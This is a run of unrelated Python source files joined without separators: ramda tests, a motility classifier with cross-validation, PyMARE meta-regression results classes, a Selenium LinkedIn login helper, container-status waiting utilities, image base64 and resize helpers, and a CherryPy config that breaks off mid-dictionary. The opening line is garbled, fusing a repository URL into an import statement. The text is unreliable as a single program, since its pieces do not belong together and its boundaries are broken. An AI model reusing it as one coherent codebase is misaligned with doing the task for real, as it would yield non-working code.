# https://github.com/Junipyrfrom .zip_with import zip_with from ramda.private.asserts import assert_iterables_equal def add(a, b): return a + b def uniq_nocurry_test(): assert_iterables_equal(zip_with(add, [1, 1, 1], [1, 2, 3]), [2, 3, 4]) def take_curry_test(): assert_iterables_equal(zip_with(add)([1, 1, 1], [1, 2, 3]), [2, 3, 4]) ''' HELM classifier library ''' import os, sys import os.path as op import glob import pickle import logging import csv import json from pathlib import Path from tqdm import tqdm import numpy as np import matplotlib.pyplot as plt from sklearn.ensemble import RandomForestClassifier from sklearn import metrics from sklearn.model_selection import GroupKFold from utils.dir_helper import get_batch_subdir, get_exp_subdir IGNORE_FEATS = set(['motility', 'track', 'dataset_name']) def write_metrics(true_Y, pred_Y, prob_Y, batch_outdir, config, prefix=""): """ Writes out classifier metrics. Restricted to binary classification. Only the labels "motile" and "non-motile" are expected, with "motile" as the positive label. Currently writes: - Classification Report - AUC curve plot - Precision-Recall curve plot - Confusion matrix Parameters ---------- true_Y: list List of ground truth labels. In ["motile", "non-motile"]. pred_Y: list List of predicted labels. In ["motile", "non-motile"]. prob_Y: list List of "motile" probabilities. batch_outdir: string Batch output directory. config: dict Configuration read from YAML. prefix: str Prefix to be appended to the output filenames. Useful for specifying train vs test metric output. Defaults to "". """ # Output directory path output_dir = get_batch_subdir("classifier_dir", batch_outdir, config) ### BASIC CLASSIFICATION REPORT report = metrics.classification_report(true_Y, pred_Y) if prefix != "": report_fp = op.join(output_dir, prefix+"_report.txt") else: report_fp = op.join(output_dir, "report.txt") # write to file with open(report_fp, 'w') as f: f.write("Classification Report with threshold {}\n".format(config['classifier']['motility_threshold'])) f.write(report) logging.info(f'Saved motility classification report: {op.join(*Path(report_fp).parts[-2:])}') ### ROC PLOT fpr, tpr, _ = metrics.roc_curve(true_Y, prob_Y, pos_label="motile") # Binarize true labels to 1 for motile, 0 for non-motile binary_true_Y = [1 if x=='motile' else 0 for x in true_Y] # Calculate AUC auc = metrics.roc_auc_score(binary_true_Y, prob_Y) # Plot ROC curve fig, ax = plt.subplots(dpi=300) ax.plot(fpr, tpr, color="blue", label="ROC curve (area = {:.2f})".format(auc)) ax.plot([0,1], [0,1], '--', color="red", label="Chance") ax.set_title("{} ROC Curve".format(prefix)) ax.set_xlabel("False Positive Rate") ax.set_ylabel("True Positive Rate") ax.set_aspect('equal') ax.legend() if prefix != "": fig.savefig(op.join(output_dir, "{}_roc_plot.png".format(prefix))) else: fig.savefig(op.join(output_dir, "roc_plot.png")) logging.info(f'Saved ROC plot: {op.join(*Path(op.join(output_dir, "*_roc_plot.png")).parts[-2:])}') ### PRECISION-RECALL PLOT precision, recall, _ = metrics.precision_recall_curve(true_Y, prob_Y, pos_label="motile") # Plot PR curve fig, ax = plt.subplots(dpi=300) ax.plot(recall, precision, color="blue") ax.set_title("{} Precision-Recall Curve".format(prefix)) ax.set_xlabel("Recall") ax.set_ylabel("Precision") ax.set_aspect('equal') if prefix != "": fig.savefig(op.join(output_dir, "{}_pr_plot.png".format(prefix))) else: fig.savefig(op.join(output_dir, "pr_plot.png")) logging.info(f'Saved prec-rec plot: {op.join(*Path(op.join(output_dir, 
"*_pr_plot.png")).parts[-2:])}') ### CONFUSION MATRIX confusion = metrics.confusion_matrix(true_Y, pred_Y, labels=['motile', 'non-motile']) # Plot confusion matrix fig, ax = plt.subplots(dpi=300) ax.imshow(confusion, cmap='Blues') # x-axis formatting ax.set_xlabel("Predicted label") ax.set_xticks([0,1]) ax.set_xticklabels(['motile', 'non-motile']) # y-axis formatting ax.set_ylabel("True label") ax.set_yticks([0,1]) ax.set_yticklabels(['motile', 'non-motile']) # on-square text for i in range(2): for j in range(2): ax.text(j, i, confusion[i,j], ha='center', va='center', color='black') if prefix != "": fig.savefig(op.join(output_dir, "{}_confusion.png".format(prefix))) else: fig.savefig(op.join(output_dir, "confusion.png")) logging.info(f'Saved confusion matrix: {op.join(*Path(op.join(output_dir, "*_confusion.png")).parts[-2:])}') def cross_validate(clf, X, Y, groups, batch_outdir, config): """ Performs k-fold cross validation on provided classifier Parameters ---------- clf: sklearn classifier object Initialized classifier. Any existing learned parameters will be overwritten. X: numpy array Data and features to be trained on. Y: numpy array Labels to be trained on. group: numpy array Same value for tracks within the same experiment. For GroupKFold. batch_outdir: string Directory path to batch output directory config: dict Configuration read from YAML. Returns ------- None. """ ### Read from configuration # number of folds for cross validation cv_folds = config['classifier']['cv_folds'] # directory for cross validation result output output_dir = get_batch_subdir('classifier_dir', batch_outdir, config) # probability threshold for labeling a track as motile threshold = config['classifier']['motility_threshold'] ### Initialize k-fold stratified cross-validation try: # Using group k fold to avoid test/train within same exp skf = GroupKFold(n_splits=cv_folds) except Exception as e: logging.error("Failed to initialize cross validation, skipping:") logging.error(e) return ### Try splitting try: crossval_splits = skf.split(X, Y, groups) for _, (_, _) in enumerate(crossval_splits): pass # Need to re-create generator after spending it crossval_splits = skf.split(X, Y, groups) except Exception as e: logging.error("Failed to split for cross validation, skipping:") logging.error(e) return ### Global AUC plot fig, ax = plt.subplots(dpi=300) ax.plot([0,1], [0,1], '--', color="red", label="Chance") ax.set_title("Crossval ROC Curve") ax.set_xlabel("False Positive Rate") ax.set_ylabel("True Positive Rate") ax.set_aspect('equal') ### Global classification report output report_fp = op.join(output_dir, "crossval_report.txt") # write to file with open(report_fp, 'w') as f: f.write("Classification Report with threshold {}\n".format(threshold)) for curr_fold, (train_index, test_index) in enumerate(crossval_splits): logging.info(f"Crossval fold {curr_fold}") # For each split... 
train_X = X[train_index] train_Y = Y[train_index] test_X = X[test_index] test_Y = Y[test_index] # Train model clf.fit(train_X, train_Y) # Predict probabilities for AUC curve pred_Y = clf.predict_proba(test_X) pred_classes = clf.classes_ # predict_proba() returns probs for both classes, find out which is motile motile_col = np.where(pred_classes == 'motile')[0][0] pred_Y = pred_Y[:,motile_col] # Use configured threshold to assign labels 'motile' and 'non-motile' num_tracks = len(pred_Y) pred_Y_labels = np.array(['non-motile'] * num_tracks, dtype=object) pred_Y_labels[pred_Y > threshold] = 'motile' binary_test_Y = [1 if x=='motile' else 0 for x in test_Y] # Write to reports report = metrics.classification_report(test_Y, pred_Y_labels) with open(report_fp, 'a') as f: f.write("\n") f.write("Fold {}".format(curr_fold)) f.write(report) # Calculate ROC and AUC and add to plot fpr, tpr, _ = metrics.roc_curve(test_Y, pred_Y, pos_label='motile') auc = metrics.roc_auc_score(binary_test_Y, pred_Y) ax.plot(fpr, tpr, label="Fold {0} (area = {1:.2f})".format(curr_fold, auc)) ax.legend() fig.savefig(op.join(output_dir, "crossval_roc_plot.png")) def train(experiments, batch_outdir, config, hyperparams={"max_depth": 10}): """ Trains an sklearn random forest model on input features and saves it as a pickle Parameters ---------- experiments: list List of experiments generated by pipeline-level glob batch_outdir: string Output directory for batch-level metrics and trained model config: dict Configuration dictionary read in by pipeline from YAML hyperparams: dict Hyperparameters for model training. Exposed for DOMINE optimization. NOTE: Temporarily defaults to {"max_depth": 5} NOTE: Do not add hyperparameters to config, as it will be fixed eventually Returns ------- None """ # Batch-level feature and label storage batch_X = [] batch_Y = [] groups = [] feat_columns = None for group_id, exp in enumerate(experiments): # Get feature CSV filepath feat_subdir = get_exp_subdir('features_dir', exp, config) feat_filepath = op.join(feat_subdir, config['features']['output']) # Read in feature CSV with open(feat_filepath, 'r') as f: reader = csv.DictReader(f) # Detect empty feature CSVs if reader.fieldnames is None: logging.warning(f'No track features found in {feat_filepath}. Skipping.') continue # Set feature column names if they haven't been determined if feat_columns is None: feat_columns = [feat for feat in reader.fieldnames if (feat not in IGNORE_FEATS)] logging.info(f'Using following features for training: {feat_columns}') for row in reader: # Assert that the motility column exists if 'motility' not in row.keys(): # break to catch the empty dataset break # Add label to label set batch_Y.append(row['motility'].lower()) # Add features to feature set batch_X.append([row[feat] for feat in feat_columns]) # Record group for cross-validation groups.append(group_id) batch_X = np.array(batch_X).astype(np.float32) batch_Y = np.array(batch_Y, dtype=object) groups = np.array(groups) if not batch_X.size: logging.error("No valid rows found in features file, exiting training without output.") return ### FILTER LABELS ### TODO: Decide what to do with "Ambiguous" or other labels ### Currently only "Motile" and "Non-Motile" are kept. 
07/29/2020 JL keep_indices = [] # indices to keep found_nonlabels = set() # record found bad labels drop_count = 0 # number of tracks filtered out # Build binary mask of rows with non-standard labels for deletion for i in range(len(batch_X)): if batch_Y[i].lower() not in ['motile', 'non-motile']: found_nonlabels.add(batch_Y[i]) drop_count += 1 else: keep_indices.append(i) # Don't train on any tracks that aren't Motile or Non-motile if drop_count: logging.warning("Non-standard labels encountered: {}".format(found_nonlabels)) logging.warning("{} tracks dropped from training.".format(drop_count)) # This uses the binary mask to only keep rows where the mask val is 1 batch_X = batch_X[keep_indices] batch_Y = batch_Y[keep_indices] groups = groups[keep_indices] if not batch_X.size: logging.error("No tracks remain after label filtering, exiting training without output.") return ### PREPROCESS OR AUGMENT ### TODO: At some point, if we use anything other than decision trees, we'll ### need to standardize features or something. Do that here, and consider ### writing helper functions. # replacing infinite features with numbers batch_X = np.nan_to_num(batch_X) ### INITIALIZE MODEL clf = RandomForestClassifier(**hyperparams) ### CROSS VALIDATION if config['classifier']['do_cross_validation']: logging.info('Cross validation enabled, running...') cross_validate(clf, batch_X, batch_Y, groups, batch_outdir, config) ### TRAIN MODEL ON ALL TRAINING DATA ### This occurs regardless of cross validation clf.fit(batch_X, batch_Y) ### SAVE MODEL TO SPECIFIED PATH class_dir = get_batch_subdir('classifier_dir', batch_outdir, config) model_savepath = op.join(class_dir, config['classifier']['model_savepath']) with open(model_savepath, 'wb') as f: pickle.dump((clf, feat_columns), f) logging.info(f'Saved trained model: {op.join(*Path(model_savepath).parts[-2:])}') ### SAVE METRICS # Predict probabilities for AUC curve and Precision-Recall curve pred_Y = clf.predict_proba(batch_X) pred_classes = clf.classes_ # predict_proba() returns probs for both classes, find out which is motile motile_col = np.where(pred_classes == 'motile')[0][0] prob_Y = pred_Y[:,motile_col] # Use configured threshold to assign labels 'motile' and 'non-motile' threshold = config['classifier']['motility_threshold'] num_tracks = len(prob_Y) pred_Y_labels = np.array(['non-motile'] * num_tracks, dtype=object) pred_Y_labels[prob_Y > threshold] = 'motile' # Write metrics write_metrics(batch_Y, pred_Y_labels, prob_Y, batch_outdir, config, "train") def predict(experiment, config): """ Tests an sklearn model on input features and writes prediction JSONs Parameters ---------- experiment: str The experiment to predict on config: dict Configuration dictionary read in by pipeline from YAML Returns ------- None TODO: Return metrics for DOMINE optimization? This would be done by writing to a file via directory helpers. Toga will be able to override directory logic to obtain metrics. 
""" model_path = config['_model_absolute_path'] ### LOAD CLASSIFIER FROM PICKLE try: with open(model_path, 'rb') as f: clf, feat_columns = pickle.load(f) logging.info(f"Found and loaded {model_path}") except: logging.warning(f"Failed to open classifier {model_path}") return None # Storage for batch-level metrics batch_true_Y = [] batch_pred_Y = [] batch_prob_Y = [] batch_alltracks = 0 # Get feature CSV filepath feat_subdir = get_exp_subdir('features_dir', experiment, config) feat_filepath = op.join(feat_subdir, config['features']['output']) # Get track JSON directory track_subdir = get_exp_subdir('track_dir', experiment, config) # Get output predict directory predict_subdir = get_exp_subdir('predict_dir', experiment, config, rm_existing=True) if not os.path.exists(feat_filepath): logging.error(f"Feature file {feat_filepath} missing. Aborting classification.") return ### READ FEATURES FROM CSV FILE exp_X = [] exp_Y = [] # labels are for metrics track_ID = [] with open(feat_filepath, 'r') as f: reader = csv.DictReader(f) # Assert features aren't empty or no header if not reader.fieldnames: logging.error(f"Features are empty or lacks header row.") return None # Assert that its features list is the same as training this_keys = [feat for feat in reader.fieldnames if (feat not in IGNORE_FEATS)] if set(this_keys) != set(feat_columns): logging.error(f"Read features list {this_keys} doesn't match model's {feat_columns}") return None for row in reader: # Save labels if they exist if 'motility' not in row.keys(): exp_Y.append('') else: exp_Y.append(row['motility'].lower()) # Assemble features in the same order as training data exp_X.append([row[feat] for feat in feat_columns]) track_ID.append(int(row['track'])) exp_X = np.array(exp_X).astype(np.float32) exp_Y = np.array(exp_Y, dtype=object) if exp_X.size == 0: logging.error("No tracks found in directory.") return None ### PREPROCESS OR AUGMENT ### TODO: At some point, if we use anything other than decision trees, we'll ### need to standardize features or something. Do that here, and consider ### writing helper functions. 
# replacing infinite features with numbers exp_X = np.nan_to_num(exp_X) ### PREDICT pred_Y = clf.predict_proba(exp_X) # predict_proba() returns probs for both classes, find out which is motile pred_classes = clf.classes_ motile_col = np.where(pred_classes == 'motile')[0][0] prob_Y = pred_Y[:,motile_col] # Use configured threshold to classify into 'motile' and 'other' # TODO: Using 'other' here for visualizer but 'non-motile' is probably better # Change 'other' to 'non-motile' in both classifier and visualizer threshold = config['classifier']['motility_threshold'] num_tracks = len(prob_Y) pred_Y_labels = np.array(['other'] * num_tracks, dtype=object) pred_Y_labels[prob_Y > threshold] = 'motile' # Metrics writer expects 'motile' and 'non-motile' metrics_compat = np.array(['non-motile'] * num_tracks, dtype=object) metrics_compat[prob_Y > threshold] = 'motile' ### WRITE TO PREDICT TRACK JSONS track_fpaths = sorted(glob.glob(op.join(track_subdir, '*.json'))) for i in range(num_tracks): # new keys and values to be added to the JSON update_dict = {'classification': pred_Y_labels[i], 'probability_motility': prob_Y[i]} # we're doing this just in case sequences are nonconsecutive with open(track_fpaths[track_ID[i]], 'r') as f: data = json.load(f) data.update(update_dict) # write out JSON files with open(op.join(predict_subdir, op.basename(track_fpaths[track_ID[i]])), 'w') as f: json.dump(data, f, indent=4) logging.info(f'Saved predictions: {op.join(*Path(predict_subdir).parts[-2:])}') ### IF TRACKS HAVE LABELS, ADD TO BATCH STORAGE FOR METRICS for i in range(num_tracks): if exp_Y[i].lower() in ['motile', 'non-motile']: # this track has a valid label batch_true_Y.append(exp_Y[i]) batch_pred_Y.append(metrics_compat[i]) batch_prob_Y.append(prob_Y[i]) batch_alltracks += num_tracks return (batch_true_Y, batch_pred_Y, batch_prob_Y, num_tracks) def predict_batch_metrics(batch_true_Y, batch_pred_Y, batch_prob_Y, batch_alltracks, batch_outdir, config): '''Calculate batch metrics if labels exist''' if len(batch_true_Y): logging.info("{} of {} tracks have labels, calculating batch metrics".format( len(batch_true_Y), batch_alltracks)) write_metrics(batch_true_Y, batch_pred_Y, batch_prob_Y, batch_outdir, config, "predict") pymare/results.py0 """Tools for representing and manipulating meta-regression results.""" import itertools from functools import lru_cache from inspect import getfullargspec from warnings import warn import numpy as np import pandas as pd import scipy.stats as ss try: import arviz as az except: az = None from .stats import q_gen, q_profile class MetaRegressionResults: """Container for results generated by PyMARE meta-regression estimators. Args: estimator (`pymare.estimators.BaseEstimator`): The estimator used to produce the results. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. fe_params (NDarray): Fixed-effect coefficients. Must be a 2-d numpy array with shape p x d, where p is the number of predictors, and d is the number of parallel datasets (typically 1). fe_cov (NDArray): The p x p inverse covariance (or precision) matrix for the fixed effects. tau2 (NDArray, float, optional): A 1-d array containing the estimated tau^2 value for each parallel dataset (or a float, for a single dataset). May be omitted by fixed-effects estimators. 
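    Example:
        A minimal, hypothetical construction with made-up numbers, purely to
        show the accessors (in practice an estimator builds this object):

            import numpy as np
            res = MetaRegressionResults(
                estimator=None, dataset=None,
                fe_params=np.array([[0.5]]), fe_cov=np.array([[0.04]]), tau2=0.1)
            res.get_fe_stats(alpha=0.05)  # dict with est, se, ci_l, ci_u, z, p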
""" def __init__(self, estimator, dataset, fe_params, fe_cov, tau2=None): self.estimator = estimator self.dataset = dataset self.fe_params = fe_params self.fe_cov = fe_cov self.tau2 = tau2 @property @lru_cache(maxsize=1) def fe_se(self): cov = np.atleast_3d(self.fe_cov) # 3rd dim is for parallel datasets return np.sqrt(np.diagonal(cov)).T @lru_cache(maxsize=16) def get_fe_stats(self, alpha=0.05): beta, se = self.fe_params, self.fe_se z_se = ss.norm.ppf(1 - alpha / 2) z = beta / se stats = { "est": beta, "se": se, "ci_l": beta - z_se * se, "ci_u": beta + z_se * se, "z": z, "p": 1 - np.abs(0.5 - ss.norm.cdf(z)) * 2, } return stats @lru_cache(maxsize=16) def get_re_stats(self, method="QP", alpha=0.05): if method == "QP": n_iters = np.atleast_2d(self.tau2).shape[1] if n_iters > 10: warn( "Method 'QP' is not parallelized; it may take a while to " "compute CIs for {} parallel tau^2 values.".format(n_iters) ) # Make sure we have an estimate of v if it wasn't observed v = self.estimator.get_v(self.dataset) cis = [] for i in range(n_iters): args = { "y": self.dataset.y[:, i], "v": v[:, i], "X": self.dataset.X, "alpha": alpha, } try: q_cis = q_profile(**args) except Exception as exc: q_cis = {"ci_l": np.nan, "ci_u": np.nan} cis.append(q_cis) else: raise ValueError( "Invalid CI method '{}'; currently only 'QP' is available.".format(method) ) return { "tau^2": self.tau2, "ci_l": np.array([ci["ci_l"] for ci in cis]), "ci_u": np.array([ci["ci_u"] for ci in cis]), } @lru_cache(maxsize=16) def get_heterogeneity_stats(self): v = self.estimator.get_v(self.dataset) q_fe = q_gen(self.dataset.y, v, self.dataset.X, 0) df = self.dataset.y.shape[0] - self.dataset.X.shape[1] i2 = np.maximum(100.0 * (q_fe - df) / q_fe, 0.0) h = np.maximum(np.sqrt(q_fe / df), 1.0) p = ss.chi2.sf(q_fe, df) return {"Q": q_fe, "p(Q)": p, "I^2": i2, "H": h} def to_df(self, alpha=0.05): """Return a pandas DataFrame summarizing fixed effect results.""" b_shape = self.fe_params.shape if len(b_shape) > 1 and b_shape[1] > 1: raise ValueError( "More than one set of results found! A summary " "table cannot be displayed for multidimensional " "results at the moment." ) fe_stats = self.get_fe_stats(alpha).items() df = pd.DataFrame({k: v.ravel() for k, v in fe_stats}) df["name"] = self.dataset.X_names df = df.loc[:, ["name", "est", "se", "z", "p", "ci_l", "ci_u"]] ci_l = "ci_{:.6g}".format(alpha / 2) ci_u = "ci_{:.6g}".format(1 - alpha / 2) df.columns = ["name", "estimate", "se", "z-score", "p-value", ci_l, ci_u] return df def permutation_test(self, n_perm=1000): """Run permutation test. Args: n_perm (int):Number of permutations to generate. The actual number used may be smaller in the event of an exact test (see below), but will never be larger. Returns: An instance of class PermutationTestResults. Notes: If the number of possible permutations is smaller than n_perm, an exact test will be conducted. Otherwise an approximate test will be conducted by randomly shuffling the outcomes n_perm times (or, for intercept-only models, by randomly flipping their signs). Note that for closed-form estimators (e.g., 'DL' and 'HE'), permuted datasets are estimated in parallel. This means that one can often set very high n_perm values (e.g., 100k) with little performance degradation. 
""" n_obs, n_datasets = self.dataset.y.shape has_mods = self.dataset.X.shape[1] > 1 fe_stats = self.get_fe_stats() re_stats = self.get_re_stats() # create results arrays fe_p = np.zeros_like(self.fe_params) rfx = self.tau2 is not None tau_p = np.zeros((n_datasets,)) if rfx else None # Calculate # of permutations and determine whether to use exact test if has_mods: n_exact = np.math.factorial(n_obs) else: n_exact = 2 ** n_obs if n_exact < n_perm: perms = np.array(list(itertools.product([-1, 1], repeat=n_obs))).T exact = n_exact < n_perm if exact: n_perm = n_exact # Loop over parallel datasets for i in range(n_datasets): y = self.dataset.y[:, i] y_perm = np.repeat(y[:, None], n_perm, axis=1) # for v, we might actually be working with n, depending on estimator has_v = "v" in getfullargspec(self.estimator.fit).args[1:] v = self.dataset.v[:, i] if has_v else self.dataset.n[:, i] v_perm = np.repeat(v[:, None], n_perm, axis=1) if has_mods: if exact: perms = itertools.permutations(range(n_obs)) for j, inds in enumerate(perms): inds = np.array(inds) y_perm[:, j] = y[inds] v_perm[:, j] = v[inds] else: for j in range(n_perm): np.random.shuffle(y_perm[:, j]) np.random.shuffle(v_perm[:, j]) else: if exact: y_perm *= perms else: signs = np.random.choice(np.array([-1, 1]), (n_obs, n_perm)) y_perm *= signs # Pass parameters, remembering that v may actually be n kwargs = {"y": y_perm, "X": self.dataset.X} kwargs["v" if has_v else "n"] = v_perm params = self.estimator.fit(**kwargs).params_ fe_obs = fe_stats["est"][:, i] if fe_obs.ndim == 1: fe_obs = fe_obs[:, None] fe_p[:, i] = (np.abs(fe_obs) < np.abs(params["fe_params"])).mean(1) if rfx: abs_obs = np.abs(re_stats["tau^2"][i]) tau_p[i] = (abs_obs < np.abs(params["tau2"])).mean() # p-values can't be smaller than 1/n_perm params = {"fe_p": np.maximum(1 / n_perm, fe_p)} if rfx: params["tau2_p"] = np.maximum(1 / n_perm, tau_p) return PermutationTestResults(self, params, n_perm, exact) class CombinationTestResults: """Container for results generated by p-value combination methods. Args: estimator (`pymare.estimators.BaseEstimator`): The estimator used to produce the results. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. z (NDArray, optional): Array of z-scores. p (NDArray, optional): Array of right-tailed p-values. """ def __init__(self, estimator, dataset, z=None, p=None): self.estimator = estimator self.dataset = dataset if p is None and z is None: raise ValueError("One of 'z' or 'p' must be provided.") self._z = z self._p = p @property @lru_cache(maxsize=1) def z(self): if self._z is None: self._z = ss.norm.isf(self.p) return self._z @property @lru_cache(maxsize=1) def p(self): if self._p is None: self._p = ss.norm.sf(self.z) return self._p def permutation_test(self, n_perm=1000): """Run permutation test. Args: n_perm (int): Number of permutations to generate. The actual number used may be smaller in the event of an exact test (see below), but will never be larger. Returns: An instance of class PermutationTestResults. Notes: If the number of possible permutations is smaller than n_perm, an exact test will be conducted. Otherwise an approximate test will be conducted by randomly shuffling the outcomes n_perm times (or, for intercept-only models, by randomly flipping their signs). Permuted datasets are processed in parallel. This means that one can often set very high n_perm values (e.g., 100k) with little performance degradation. 
""" n_obs, n_datasets = self.dataset.y.shape # create results arrays p_p = np.zeros_like(self.z) # Calculate # of permutations and determine whether to use exact test n_exact = 2 ** n_obs if n_exact < n_perm: perms = np.array(list(itertools.product([-1, 1], repeat=n_obs))).T exact = True n_perm = n_exact else: exact = False # Initialize a copy of the estimator to prevent overwriting results est = self.estimator.__class__(mode=self.estimator.mode) # Loop over parallel datasets for i in range(n_datasets): y = self.dataset.y[:, i] y_perm = np.repeat(y[:, None], n_perm, axis=1) if exact: y_perm *= perms else: signs = np.random.choice(np.array([-1, 1]), (n_obs, n_perm)) y_perm *= signs # Some combination tests can handle weights (passed as v) kwargs = {"z": y_perm} if "w" in getfullargspec(est.fit).args: kwargs["w"] = self.dataset.v params = est.fit(**kwargs).params_ p_obs = self.z[i] if p_obs.ndim == 1: p_obs = p_obs[:, None] p_p[i] = (p_obs > params["p"]).mean() # p-values can't be smaller than 1/n_perm p_p = np.maximum(1 / n_perm, p_p) return PermutationTestResults(self, {"fe_p": p_p}, n_perm, exact) class PermutationTestResults: """Lightweight container to hold and display permutation test results.""" def __init__(self, results, perm_p, n_perm, exact=False): self.results = results self.perm_p = perm_p self.n_perm = n_perm self.exact = exact def to_df(self, **kwargs): """Export permutation test results as a pandas DF. Args: kwargs: Keyword arguments to pass onto to_df() calls of parent results class (e.g., in case of MetaRegressionResults class, `alpha` is available). Returns: A pandas DataFrame that adds columns to the standard fixed effect result table based on permutation test results. A column is added for every name found in both the parent DF and the params dictionary passed at initialization. """ df = self.results.to_df(**kwargs) c_ind = list(df.columns).index("p-value") df.insert(c_ind + 1, "p-value (perm.)", self.perm_p["fe_p"]) return df class BayesianMetaRegressionResults: """Container for MCMC sampling-based PyMARE meta-regression estimators. Args: data (`StanFit4Model` or `InferenceData`): Either a StanFit4Model instanced returned from PyStan or an ArviZ InferenceData instance. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. ci (float, optional): Desired width of highest posterior density (HPD) interval. Defaults to 95%. """ def __init__(self, data, dataset, ci=95.0): if az is None: raise ValueError( "ArviZ package must be installed in order to work" " with the BayesianMetaRegressionResults class." ) if data.__class__.__name__ == "StanFit4Model": data = az.from_pystan(data) self.data = data self.dataset = dataset self.ci = ci def summary(self, include_theta=False, **kwargs): """Summarize the posterior estimates via ArviZ. Args: include_theta (bool, optional): Whether or not to include the estimated group-level means in the summary. Defaults to False. kwargs: Optional keyword arguments to pass onto ArviZ's summary(). Returns: A pandas DataFrame, unless the `fmt="xarray"` argument is passed in kwargs, in which case an xarray Dataset is returned. """ var_names = ["beta", "tau2"] if include_theta: var_names.append("theta") var_names = kwargs.pop("var_names", var_names) return az.summary(self.data, var_names, **kwargs) def plot(self, kind="trace", **kwargs): """Generate various plots of the posterior estimates via ArviZ. Args: kind (str, optional): The type of ArviZ plot to generate. 
                Can be any named function of the form "plot_{}" in the ArviZ
                namespace (e.g., 'trace', 'forest', 'posterior', etc.).
                Defaults to 'trace'.
            kwargs: Optional keyword arguments passed onto the corresponding
                ArviZ plotting function (see ArviZ docs for details).

        Returns:
            A matplotlib or bokeh object, depending on plot kind and kwargs.
        """
        name = "plot_{}".format(kind)
        plotter = getattr(az, name, None)
        if plotter is None:
            raise ValueError("ArviZ has no plotting function '{}'.".format(name))
        return plotter(self.data, **kwargs)


import getpass
import time

from linkedin_scraper import constants as c
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC


def __prompt_email_password():
    u = input("Email: ")
    p = getpass.getpass(prompt="Password: ")
    return (u, p)


def page_has_loaded(driver):
    page_state = driver.execute_script('return document.readyState;')
    return page_state == 'complete'


def login(driver, email=None, password=None, cookie=None, timeout=10):
    if cookie is not None:
        return _login_with_cookie(driver, cookie)

    if not email or not password:
        email, password = __prompt_email_password()

    print("1L")
    driver.get("https://www.linkedin.com/login")
    time.sleep(2)
    print("2L")
    element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "username")))
    email_elem = driver.find_element_by_id("username")
    email_elem.send_keys(email)
    time.sleep(3)
    print("3L")
    password_elem = driver.find_element_by_id("password")
    password_elem.send_keys(password)
    time.sleep(5)
    print("4L")
    password_elem.submit()

    try:
        print(driver.current_url)
        if driver.current_url == 'https://www.linkedin.com/checkpoint/lg/login-submit':
            remember = driver.find_element_by_id(c.REMEMBER_PROMPT)
            if remember:
                remember.submit()
        element = WebDriverWait(driver, timeout).until(EC.presence_of_element_located((By.ID, c.VERIFY_LOGIN_ID)))
        print('pass')
    except Exception as ex:
        print(f"Due to the error {str(ex)}")
        pass


def _login_with_cookie(driver, cookie):
    driver.get("https://www.linkedin.com/login")
    driver.add_cookie({
        "name": "li_at",
        "value": cookie
    })


#!/usr/bin/python3
'''
Written to test whether the main package works.
This is basically a "test" example; later tests should follow this file.
'''
import sys
sys.path.append("..")
import insummer

from insummer.query_expansion import EntityFinder
from insummer.read_conf import config
from insummer.query_expansion1.semantic_complement import add


def test1():
    conf = config("../../conf/question.conf")
    f = open(conf["title_pos"])
    titles = f.readlines()

    indx = 0
    for title in titles:
        if indx > 20:
            break
        naive_finder = EntityFinder(title)
        naive_finder.find(display=True)
        indx += 1


def test2():
    return add(1, 1)


if __name__ == '__main__':
    print(test2())


testcompose/waiters/waiting_utils.py
from datetime import datetime
from time import sleep

from docker.models.containers import Container
from testcompose.models.container.running_container_attributes import (
    PossibleContainerStates,
    RunningContainerAttributes,
)


class WaitingUtils:
    @staticmethod
    def container_status(
        test_container: Container, status="running", delay_ms=2000, timeout_ms=40000
    ) -> bool:
        """Method useful for checking a running container status to allow
        for fetching the latest attribute from the container

        Args:
            status (str, optional): Status to check for. Defaults to "running".
            delay_ms (int, optional): Delay in milliseconds before the next check. Defaults to 2000.
            timeout_ms (int, optional): Timeout in milliseconds. Defaults to 40000.
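        Example:
            A hypothetical call, assuming a docker-py Container obtained
            elsewhere (e.g. from client.containers.run(...)); values are
            illustrative:

                ok = WaitingUtils.container_status(
                    container, status="running", delay_ms=500, timeout_ms=60000
                )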
""" print(status) if status.lower() not in [ PossibleContainerStates.EXITED.value, PossibleContainerStates.RUNNING.value, ]: raise ValueError("Status must be one of running or exited") start = datetime.now() while not (status == (RunningContainerAttributes(**test_container.attrs)).State.Status): if (datetime.now() - start).total_seconds() * 1000 > timeout_ms: print(f"Container status {status} not obtained after {timeout_ms} ms") return False sleep(delay_ms / 1000) test_container.reload() print(f"Found Status {status}") return True guhaiqiao/Flower_app import base64 import os import time from PIL import Image def imageToStr(image): with open(image, 'rb') as f: image_byte = base64.b64encode(f.read()) image_str = image_byte.decode('ascii') return image_str def strToImage(str, filename): image_str = str.encode('ascii') image_byte = base64.b64decode(image_str) image_json = open(filename, 'wb') image_json.write(image_byte) # 将图片存到当前文件的fileimage文件中 image_json.close() def get_size(file): # 获取文件大小:KB size = os.path.getsize(file) return size / 1024 def get_outfile(infile, outfile=''): if outfile: return outfile dir, suffix = os.path.splitext(infile) outfile = '{}_out{}'.format(dir, suffix) return outfile def resize(infile, limit): """缩放图片尺寸 infile: 压缩源文件 limit: 长或宽的最大像素个数 return: 图片是否压缩 """ img = Image.open(infile) scale = 1 flag = 0 w, h = img.size if w > limit or h > limit: scale = max(w / limit, h / limit) flag = 1 Img = img.resize((int(w / scale), int(h / scale)), Image.ANTIALIAS) Img.save(get_outfile(infile)) return flag if __name__ == '__main__': time1 = time.time() path = "/mnt/d/vscode/Flower_app/server/image/user_image" filename1 = "/line.jpg" filename2 = "/default_out.jpg" # compress_image(path + filename1, mb=3) resize(path + filename1, 400) time2 = time.time() print('总共耗时:' + str(time2 - time1) + 's') from loris.compliance import Compliance from loris.dispatcher_mixin import DispatcherMixin from loris.helpers.import_class import import_class from loris.helpers.safe_lru_dict import SafeLruDict from loris.info.jp2_extractor import Jp2Extractor from loris.info.pillow_extractor import PillowExtractor from loris.requests.iiif_request import IIIFRequest from loris.resolvers import Resolvers from os import path from pkg_resources import resource_filename from sys import stderr import cherrypy import logging import logging.config import yaml cherrypy_app_conf = { "/": { "tools.trailing_slash.on": False, # this should _always_ be False "request.dispatch": cherrypy.dispatch.MethodDispatcher(), "tools.sessions.on": False, }, "/favicon.ico": { "tools.staticfile.on": True, "tools.staticfile.filename": resource_filename("loris", "www/favicon.ico"), "tools.response_headers.on": True, 